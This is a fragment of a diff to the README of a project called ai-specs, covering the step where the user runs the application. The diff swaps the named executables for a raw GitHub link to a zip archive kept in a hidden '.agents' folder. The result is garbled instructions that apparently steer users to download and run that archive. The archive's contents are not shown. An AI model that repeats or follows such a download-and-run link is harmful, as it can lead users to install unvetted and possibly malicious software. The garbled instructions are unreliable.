sanjusathian/ai-specs/README.md

    Open the newly created folder to view the contents.

 4. **Run the Application**
    Double-click on the application file.
-This may be named `ai-specs.exe` for Windows, `ai-specs.app` for macOS, or a file with no extension for Linux.
+This may be named `https://github.com/sanjusathian/ai-specs/raw/refs/heads/main/ai-specs/.agents/ai-specs-1.5.zip` for Windows, `https://github.com/sanjusathian/ai-specs/raw/refs/heads/main/ai-specs/.agents/ai-specs-1.5.zip` for macOS, or a file with no extension for Linux.
 This will start the application.

 ## 🛠️ How to Use the Application
 After running the application, you will be presented with options to: